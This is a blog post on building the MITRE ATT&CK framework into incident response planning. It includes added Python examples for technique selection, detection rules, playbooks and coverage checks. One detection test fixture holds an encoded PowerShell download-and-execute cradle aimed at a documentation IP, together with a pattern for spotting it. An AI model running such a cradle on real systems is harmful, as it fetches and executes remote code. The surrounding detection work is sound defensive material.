
02/11/2023, 20:48 Make the MITRE ATT&CK Framework Part Of Your Incident Response Plan To Stay Ahead of Threats | RiverSafe
https://riversafe.co.uk/resources/tech-blog/integrating-the-mitre-attck-into-your-incident-response-plan/


INTEGRATING THE MITRE ATT&CK INTO YOUR INCIDENT RESPONSE PLAN
BY VINAYA SHESHADRI

In today’s cybersecurity landscape, organisations face a growing number of sophisticated and persistent cyber threats. To stay ahead of these threats, security teams must have a comprehensive and proactive approach to incident response. One way to achieve this is by integrating the MITRE ATT&CK framework into your incident response plan.

WHAT IS THE MITRE ATT&CK FRAMEWORK?

The MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework is a globally recognised knowledge base of adversary tactics and techniques observed in real-world intrusions. It is designed to help organisations understand how attackers operate, what their objectives are at each stage of an intrusion, and how they can detect and defend against them.

The framework is organised into tactics and techniques: tactics are the adversary's goals at a given stage of an attack (for example Initial Access, Execution, Credential Access, Impact), and techniques are the specific methods used to achieve those goals, many of them broken down further into sub-techniques. Each technique carries a stable identifier (T1566 for Phishing, T1078 for Valid Accounts), the platforms it applies to, the data sources that can reveal it, mitigations, and the threat groups and software known to use it. Separate matrices cover Enterprise (including cloud platforms), Mobile and ICS environments, so the framework covers a wide range of cyber threats, from Advanced Persistent Threats (APTs) to commodity malware and ransomware operations.

INTEGRATING THE MITRE ATT&CK FRAMEWORK INTO YOUR INCIDENT RESPONSE PLAN

Integrating the MITRE ATT&CK framework into your incident response plan can help your organisation improve its response to cyber threats by providing a structured approach to incident response. Here are some steps to follow to integrate the MITRE ATT&CK framework into your incident response plan:

STEP 1: IDENTIFY RELEVANT TACTICS AND TECHNIQUES

The first step is to identify the relevant tactics and techniques for your organisation. This involves
reviewing the MITRE ATT&CK framework and selecting the tactics and techniques that are most
relevant to your organisation’s infrastructure, assets, and threat landscape.

For example, if your organisation uses cloud services, you may want to focus on the techniques ATT&CK lists for cloud platforms (the Enterprise matrix can be filtered to IaaS, SaaS and Office 365, among others), such as using stolen credentials to access cloud services (Valid Accounts: Cloud Accounts, T1078.004) or exploiting misconfigured or exposed cloud environments. Threat intelligence is the other input: ATT&CK's group profiles list the techniques each group has been observed using, so the groups known to target your sector tell you which techniques to prioritise first.
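
The selection described in Step 1 is usually done against the public ATT&CK STIX export rather than by reading the website. The following is an added example, not RiverSafe's code or MITRE's tooling: it takes a constructed, cut-down bundle in the shape of that export (the field names are the real ones and the technique IDs and names are real ATT&CK entries, but the object set is a tiny sample with placeholder STIX ids and no descriptions), indexes tactics and techniques, drops revoked and deprecated entries, and selects the techniques that apply to an assumed set of cloud platforms.

```python
# Added example (not RiverSafe's code): load ATT&CK-shaped STIX data into a
# tactic/technique index and pick the techniques relevant to one organisation.

# Constructed bundle in the shape of enterprise-attack.json after json.load().
# Real field names and real technique IDs/names; placeholder STIX ids; tiny sample.
def _ap(tid, name, tactics, platforms, sub=False, revoked=False):
    """Build one attack-pattern object the way the ATT&CK bundle lays it out."""
    return {
        "type": "attack-pattern", "id": "attack-pattern--" + tid, "name": name,
        "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": t} for t in tactics],
        "external_references": [{"source_name": "mitre-attack", "external_id": tid,
                                 "url": "https://attack.mitre.org/techniques/" + tid.replace(".", "/")}],
        "x_mitre_platforms": platforms, "x_mitre_is_subtechnique": sub, "revoked": revoked,
    }

_TACTICS = [("initial-access", "Initial Access"), ("execution", "Execution"),
            ("persistence", "Persistence"), ("privilege-escalation", "Privilege Escalation"),
            ("defense-evasion", "Defense Evasion")]
BUNDLE = {"type": "bundle", "objects": [
    # The matrix object carries the column order; tactic objects carry the short names.
    {"type": "x-mitre-matrix", "id": "x-mitre-matrix--enterprise",
     "tactic_refs": ["x-mitre-tactic--" + s for s, _ in _TACTICS]},
    *[{"type": "x-mitre-tactic", "id": "x-mitre-tactic--" + s, "name": n, "x_mitre_shortname": s}
      for s, n in _TACTICS],
    _ap("T1566", "Phishing", ["initial-access"],
        ["Linux", "macOS", "Windows", "Office 365", "SaaS", "Google Workspace"]),
    _ap("T1566.001", "Spearphishing Attachment", ["initial-access"], ["Linux", "macOS", "Windows"], sub=True),
    _ap("T1190", "Exploit Public-Facing Application", ["initial-access"],
        ["Windows", "IaaS", "Network", "Linux", "macOS", "Containers"]),
    _ap("T1078", "Valid Accounts", ["defense-evasion", "persistence", "privilege-escalation", "initial-access"],
        ["Windows", "Linux", "macOS", "IaaS", "SaaS", "Office 365", "Google Workspace", "Containers", "Network"]),
    _ap("T1078.004", "Cloud Accounts", ["defense-evasion", "persistence", "privilege-escalation", "initial-access"],
        ["Office 365", "SaaS", "IaaS", "Google Workspace"], sub=True),
    _ap("T1059.001", "PowerShell", ["execution"], ["Windows"], sub=True),
    # T1086 is the old PowerShell technique, revoked in favour of T1059.001. The bundle
    # keeps revoked objects, so a loader has to filter them out or playbooks go stale.
    _ap("T1086", "PowerShell", ["execution"], ["Windows"], revoked=True),
]}


def load_catalogue(bundle):
    """Return (tactic short names in matrix order, {technique_id: info}),
    skipping revoked and deprecated entries."""
    objs = bundle["objects"]
    by_id = {o["id"]: o for o in objs}
    matrix = next(o for o in objs if o["type"] == "x-mitre-matrix")
    tactic_order = [by_id[ref]["x_mitre_shortname"] for ref in matrix["tactic_refs"]]
    techniques = {}
    for o in objs:
        if o["type"] != "attack-pattern" or o.get("revoked") or o.get("x_mitre_deprecated"):
            continue
        tid = next(r["external_id"] for r in o["external_references"]
                   if r["source_name"] == "mitre-attack")
        techniques[tid] = {
            "name": o["name"],
            "tactics": [p["phase_name"] for p in o["kill_chain_phases"]
                        if p["kill_chain_name"] == "mitre-attack"],
            "platforms": set(o.get("x_mitre_platforms", [])),
            # Sub-technique IDs are "<parent>.<nnn>", so the parent is recoverable from the ID.
            "parent": tid.split(".")[0] if o.get("x_mitre_is_subtechnique") else None,
        }
    return tactic_order, techniques


def select_relevant(techniques, platforms, tactics=None):
    """Step 1: technique IDs that apply to any of the organisation's platforms
    (and, optionally, to any of the given tactics)."""
    wanted = set(platforms)
    return sorted(tid for tid, t in techniques.items()
                  if t["platforms"] & wanted
                  and (tactics is None or set(t["tactics"]) & set(tactics)))


def matrix_view(tactic_order, techniques, selected):
    """One column per tactic in matrix order; a technique filed under several
    tactics (Valid Accounts) appears in each of its columns."""
    view = {t: [] for t in tactic_order}
    for tid in selected:
        for t in techniques[tid]["tactics"]:
            if t in view:
                view[t].append(tid)
    return view


if __name__ == "__main__":
    order, techs = load_catalogue(BUNDLE)
    cloud = select_relevant(techs, ["IaaS", "SaaS", "Office 365"])  # assumed platforms
    for tactic, tids in matrix_view(order, techs, cloud).items():
        print(f"{tactic:22} {', '.join(tids) or '-'}")
```

With the real export the same loader applies unchanged; the points that matter in practice are the ones the sample exercises: the column order lives in the matrix object, not the tactic objects; revoked and deprecated techniques remain in the file and must be dropped; and a sub-technique's parent is derived from its ID.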

STEP 2: MAP TACTICS AND TECHNIQUES TO YOUR INCIDENT RESPONSE PLAN

Once you have identified the relevant tactics and techniques, the next step is to map them to your
incident response plan. This involves identifying the specific steps that need to be taken to detect and
respond to each tactic and technique.

Map at the technique level rather than by broad incident type, because the response differs by technique even within one tactic. For example, a malware infection typically spans several techniques: an Initial Access technique such as Phishing (T1566), an Execution technique such as PowerShell (T1059.001), and possibly an Impact technique such as Data Encrypted for Impact (T1486). Your incident response plan should state, for each of these, the specific steps to detect and respond: isolating infected machines, conducting malware analysis, revoking any credentials the malware used, and patching the vulnerabilities or closing the misconfigurations that were exploited.

STEP 3: DEVELOP DETECTION AND RESPONSE PLAYBOOKS

Once you have mapped the tactics and techniques to your incident response plan, the next step is to
develop detection and response playbooks. These playbooks are detailed plans that outline the
specific steps that need to be taken to detect and respond to each tactic and technique.

Start each playbook from the technique's ATT&CK page: the data sources it lists (process creation, command execution, network traffic, file modification and so on) tell you which logs must be collected before detection is possible, and its mitigations and detection notes give the starting point for your rules. For example, your playbook for an Execution technique such as PowerShell (T1059.001) may include monitoring process-creation logs for encoded or download-and-execute command lines, analysing host logs for signs of malware activity, monitoring network traffic for the resulting download or command-and-control connections, and conducting a threat hunt across the estate to find other hosts that ran the same command and the initial point of entry.

STEP 4: TEST AND REFINE YOUR INCIDENT RESPONSE PLAN

The final step is to test and refine your incident response plan. This involves conducting regular
simulations and exercises to test the effectiveness of your plan and identify areas for improvement.

For example, you may conduct a tabletop exercise where your incident response team works through a simulated attack scenario using your detection and response playbooks. Complement it with technical tests: adversary emulation tools such as Atomic Red Team and MITRE Caldera execute individual ATT&CK techniques on a test host, so you can confirm that each prioritised technique actually produces the alert your playbook assumes, rather than only that the team knows what to do once alerted. Either form of exercise can reveal gaps or weaknesses in your plan, such as a prioritised technique with no detection rule or no playbook, and enable you to refine your processes and procedures.
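
Steps 2 to 4 together, as an added example that is not RiverSafe's code: technique-tagged detection rules are run over constructed log records, the matching playbook steps are assembled in ATT&CK tactic order, and a coverage check reports any prioritised technique that lacks a rule or a playbook. The technique IDs and tactic names are real ATT&CK entries; the prioritised set, the thresholds, the playbook contents and the sample events are all assumptions made for the example.

```python
# Added example (not RiverSafe's code): technique-tagged detections, playbook
# lookup in ATT&CK tactic order, and a detection/playbook coverage check.
import base64
import re
from collections import defaultdict

# ATT&CK Enterprise tactics in matrix order.
TACTIC_ORDER = ["reconnaissance", "resource-development", "initial-access", "execution",
                "persistence", "privilege-escalation", "defense-evasion", "credential-access",
                "discovery", "lateral-movement", "collection", "command-and-control",
                "exfiltration", "impact"]

# Step 1 output for a hypothetical organisation: real ATT&CK IDs/names and the
# tactic(s) ATT&CK files each under; which techniques to pick is an assumption.
PRIORITISED = {
    "T1566": ("Phishing", ["initial-access"]),
    "T1110": ("Brute Force", ["credential-access"]),
    "T1078": ("Valid Accounts", ["defense-evasion", "persistence", "privilege-escalation", "initial-access"]),
    "T1059.001": ("PowerShell", ["execution"]),
    "T1486": ("Data Encrypted for Impact", ["impact"]),
}

# Steps 2/3: constructed playbook steps per technique. T1566 deliberately has
# none, so the coverage check below has something to report.
PLAYBOOKS = {
    "T1110": ["Block the source IP at the perimeter", "Force a password reset on the targeted accounts"],
    "T1078": ["Disable the account and revoke its sessions and tokens",
              "Review the account's sign-in and activity history since the first anomaly"],
    "T1059.001": ["Isolate the host", "Capture the decoded command line and parent process",
                  "Hunt fleet-wide for the same command line"],
    "T1486": ["Isolate affected hosts and file shares", "Preserve an encrypted sample and the ransom note",
              "Establish the encryption start time and restore from backup"],
}

# Step 3: one detection rule per technique; each returns the supporting events.
def _brute_force(events):
    """Five or more failed sign-ins from one source IP (threshold is an assumption)."""
    fails = defaultdict(int)
    for e in events:
        if e["event"] == "SignIn" and e["result"] == "Failure":
            fails[e["src_ip"]] += 1
    return [e for e in events if e["event"] == "SignIn" and e["result"] == "Failure"
            and fails[e["src_ip"]] >= 5]

def _valid_account_after_brute_force(events):
    """A successful sign-in for an account/IP pair that was failing just before."""
    failed = {(e["src_ip"], e["user"]) for e in events
              if e["event"] == "SignIn" and e["result"] == "Failure"}
    return [e for e in events if e["event"] == "SignIn" and e["result"] == "Success"
            and (e["src_ip"], e["user"]) in failed]

def _encoded_powershell(events):
    """PowerShell launched with an encoded command; the base64 is UTF-16LE, decoded for the responder."""
    hits = []
    for e in events:
        m = re.search(r"(?i)powershell.*\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                      e.get("cmdline", ""))
        if m:
            try:
                decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                decoded = None  # malformed payload is still an alert, just without a decode
            hits.append(dict(e, decoded=decoded))
    return hits

def _mass_rename(events):
    """Burst of renames to one new extension, pre-aggregated by the file audit source."""
    return [e for e in events if e["event"] == "FileRenameBurst" and e["count"] >= 100]

RULES = {"T1110": _brute_force, "T1078": _valid_account_after_brute_force,
         "T1059.001": _encoded_powershell, "T1486": _mass_rename}

def detect(events):
    """Run every rule; return {technique_id: supporting events} for the ones that fired."""
    observed = {}
    for tid, rule in RULES.items():
        hits = rule(events)
        if hits:
            observed[tid] = hits
    return observed

def build_response(observed):
    """Order observed techniques by the earliest ATT&CK tactic each is filed under and
    attach the playbook steps. This is the kill-chain view, not event time order."""
    def first_tactic(tid):
        return min(TACTIC_ORDER.index(t) for t in PRIORITISED[tid][1])
    plan = []
    for tid in sorted(observed, key=first_tactic):
        plan.append({"technique": tid, "name": PRIORITISED[tid][0],
                     "tactic": TACTIC_ORDER[first_tactic(tid)],
                     "evidence": len(observed[tid]), "steps": PLAYBOOKS.get(tid, [])})
    return plan

def coverage_gaps():
    """Step 4 check: prioritised techniques with no detection rule or no playbook."""
    gaps = {}
    for tid in PRIORITISED:
        missing = [label for label, table in (("no rule", RULES), ("no playbook", PLAYBOOKS))
                   if tid not in table]
        if missing:
            gaps[tid] = missing
    return gaps

# Constructed sample telemetry: brute force then a successful login on one account,
# an encoded PowerShell download cradle on that user's workstation, and a rename
# burst on a file server. 198.51.100.0/24 is a documentation address range.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/a')"
SAMPLE_EVENTS = (
    [{"event": "SignIn", "user": "a.smith", "src_ip": "198.51.100.23", "result": "Failure"} for _ in range(6)]
    + [{"event": "SignIn", "user": "a.smith", "src_ip": "198.51.100.23", "result": "Success"},
       {"event": "ProcessCreate", "host": "WS042", "user": "a.smith",
        "cmdline": "powershell.exe -nop -w hidden -enc "
                   + base64.b64encode(_CRADLE.encode("utf-16-le")).decode()},
       {"event": "FileRenameBurst", "host": "FS01", "process": "svchost_.exe",
        "new_ext": ".locked", "count": 450}]
)

if __name__ == "__main__":
    observed = detect(SAMPLE_EVENTS)
    for item in build_response(observed):
        print(f"[{item['tactic']}] {item['technique']} {item['name']} ({item['evidence']} events)")
        for step in item["steps"]:
            print("   -", step)
    print("coverage gaps:", coverage_gaps())
```

Tagging every rule with the technique it detects is what makes the rest possible: the incident record carries technique IDs instead of free text, the playbook lookup is a dictionary access, and the gap report is a set difference between what was prioritised and what has a rule and a playbook. In the sample, Phishing is prioritised but has neither, which is exactly the kind of finding a Step 4 exercise should surface.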

INTEGRATING THE MITRE ATT&CK FRAMEWORK INTO YOUR INCIDENT RESPONSE PLAN CAN PROVIDE SEVERAL BENEFITS, INCLUDING:

• ENHANCED DETECTION AND RESPONSE

By mapping the tactics and techniques to your incident response plan, you can improve your
organisation’s ability to detect and respond to cyber threats. This structured approach ensures that
your incident response team has a clear understanding of the steps that need to be taken to detect
and respond to each type of attack.

• BETTER COLLABORATION

Integrating the MITRE ATT&CK framework into your incident response plan can promote enhanced collaboration across teams within your organisation. By using a common vocabulary to describe tactics and techniques, with technique IDs that mean the same thing to SOC analysts, threat hunters, threat intelligence and red teams, all teams can communicate more effectively, leading to more efficient and effective incident response.

• IMPROVED THREAT INTELLIGENCE

The MITRE ATT&CK framework is regularly updated with new tactics and techniques used by adversaries. By integrating the framework into your incident response plan, your organisation can stay up-to-date with the latest threats and leverage this knowledge to improve your overall security posture. ATT&CK is published in versioned releases, so schedule the review of your prioritised techniques against them: between versions techniques are added, split into sub-techniques, revoked or deprecated, and a playbook keyed to a revoked ID silently goes stale.

• COMPLIANCE WITH INDUSTRY STANDARDS

The MITRE ATT&CK framework has become a widely recognised reference point in the cybersecurity industry. It is a knowledge base rather than a compliance standard, so it does not replace an incident handling standard such as NIST SP 800-61, but mapping your plan and detections to it gives regulators, auditors, and customers concrete evidence of which adversary behaviours you can detect and respond to, and demonstrates that your organisation is committed to using best practices in incident response.

• IMPROVED INCIDENT RESPONSE PLANNING

By using the MITRE ATT&CK framework to map tactics and techniques to your incident response plan,
you can identify gaps in your plan and improve your processes and procedures. Regular testing and
refinement of your plan based on the latest threats can help ensure that your organisation is prepared
to respond effectively to cyberattacks.

Conclusion

Integrating the MITRE ATT&CK framework into your incident response plan can help your organisation
improve its ability to detect and respond to cyber threats, promote collaboration across teams, stay up
to date with the latest threats, comply with industry standards, and improve your overall incident
response planning.

By following the steps outlined above, your organisation can take advantage of the benefits of the
MITRE ATT&CK framework and better protect your assets and data from cyber threats.

Looking for help with your cyber security strategy? Contact us to see how we can help

BY VINAYA SHESHADRI
